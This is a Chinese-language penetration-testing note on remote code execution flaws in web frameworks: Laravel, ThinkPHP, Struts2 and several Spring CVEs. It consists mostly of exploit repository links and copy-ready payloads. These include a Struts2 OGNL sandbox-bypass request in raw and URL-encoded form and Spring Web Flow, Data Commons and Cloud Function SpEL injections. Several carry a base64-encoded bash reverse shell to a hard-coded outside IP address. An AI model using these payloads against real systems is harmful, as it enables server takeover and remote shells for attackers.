框架安全&CVE复现&Spring&Struts&Laravel&ThinkPHP

• 框架安全&CVE复现&Spring&Struts&Laravel&ThinkPHP

  ---

  1、开发框架-PHP-Laravel-Thinkphp

  2、开发框架-Javaweb-St2-Spring

  3、开发框架-Python-django-Flask

  4、开发框架-Javascript-Node.js-JQuery

  常见语言开发框架：
  
  PHP：Thinkphp Laravel YII CodeIgniter CakePHP Zend等
  
  JAVA：Spring MyBatis Hibernate Struts2 Springboot等
  
  Python：Django Flask Bottle Turbobars Tornado Web2py等
  
  Javascript：Vue.js Node.js Bootstrap JQuery Angular 等
  

  一个网站的源码应用：

  1.源码采用框架开发的

  完全依赖于框架自身的安全机制

  2.源码采用原生态开发的

  整个文件上传文件功能都是自己写的， 自己控制 自己控制

  PHP-开发框架安全-Thinkphp&Laravel

  Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。
  
  CVE-2021-3129 RCE
  
  Laravel <= 8.4.2
  
  https://github.com/zhzyker/CVE-2021-3129
  
  https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
  
  
  
  Thinkphp-3.X RCE-5.X RCE
  
  ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架
  
  武器库-Thinkphp专检
  
  

  JAVAWEB-开发框架安全-Spring&Struts2

  Struts2是一个基于MVC设计模式的Web应用框架

  1.cve_2020_17530

  脚本：https://github.com/YanMu2020/s2-062
  
  手工：
  
  Content-Type: multipart/form-data; boundary=----1
  
  
  
  ------1
  
  Content-Disposition: form-data; name="id"
  
  
  
  %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
  
  ------1--
  
  
  
  bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
  
  
  
  
  
  Content-Type: application/x-www-form-urlencoded
  
  
  
  id=%25%7b%28%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%3d%23%61%70%70%6c%69%63%61%74%69%6f%6e%5b%22%6f%72%67%2e%61%70%61%63%68%65%2e%74%6f%6d%63%61%74%2e%49%6e%73%74%61%6e%63%65%4d%61%6e%61%67%65%72%22%5d%29%2e%28%23%73%74%61%63%6b%3d%23%61%74%74%72%5b%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%75%74%69%6c%2e%56%61%6c%75%65%53%74%61%63%6b%2e%56%61%6c%75%65%53%74%61%63%6b%22%5d%29%2e%28%23%62%65%61%6e%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%63%6f%6c%6c%65%63%74%69%6f%6e%73%2e%42%65%61%6e%4d%61%70%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%73%74%61%63%6b%29%29%2e%28%23%63%6f%6e%74%65%78%74%3d%23%62%65%61%6e%2e%67%65%74%28%22%63%6f%6e%74%65%78%74%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%63%6f%6e%74%65%78%74%29%29%2e%28%23%6d%61%63%63%3d%23%62%65%61%6e%2e%67%65%74%28%22%6d%65%6d%62%65%72%41%63%63%65%73%73%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%6d%61%63%63%29%29%2e%28%23%65%6d%70%74%79%73%65%74%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6a%61%76%61%2e%75%74%69%6c%2e%48%61%73%68%53%65%74%22%29%29%2e%28%23%62%65%61%6e%2e%70%75%74%28%22%65%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%22%2c%23%65%6d%70%74%79%73%65%74%29%29%2e%28%23%62%65%61%6e%2e%70%75%74%28%22%65%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%22%2c%23%65%6d%70%74%79%73%65%74%29%29%2e%28%23%61%72%67%6c%69%73%74%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6a%61%76%61%2e%75%74%69%6c%2e%41%72%72%61%79%4c%69%73%74%22%29%29%2e%28%23%61%72%67%6c%69%73%74%2e%61%64%64%28%22%77%68%6f%61%6d%69%22%29%29%2e%28%23%65%78%65%63%75%74%65%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%29%29%2e%28%23%65%78%65%63%75%74%65%2e%65%78%65%63%28%23%61%72%67%6c%69%73%74%29%29%7d
  

  2.cve_2021_31805

  https://github.com/YanMu2020/s2-062
  
  
  

  Spring框架是由于软件开发的复杂性而创建的。

  1、cve_2017_4971-Spring Web Flow

  Spring WebFlow 2.4.0 - 2.4.4
  
  https://paper.seebug.org/322/
  
  _eventId_confirm=&_csrf=e06e1d86-e083-45f7-b700-567b5f7f5d30&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/47.94.236.117/5566+0>%261")).start()=vulhub
  

  2、cve_2018_1273-Spring Data Commons

  Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
  Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
  Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
  Spring Data REST 3.0 - 3.0.5 (Kay SR5)
  bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
  username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%30%4e%79%34%35%4e%43%34%79%4d%7a%59%75%4d%54%45%33%4c%7a%55%31%4e%6a%59%67%4d%44%34%6d%4d%51%3d%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d")]=&password=&repeatedPassword=
  

  3、CVE-2022-22963 Spring Cloud Function Spel表达式注入

  Spring Cloud Function 提供了一个通用的模型，用于在各种平台上部署基于函数的软件，包括像 Amazon AWS Lambda 这样的 FaaS（函数即服务，function as a service）平台。
  Connection: close
  spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")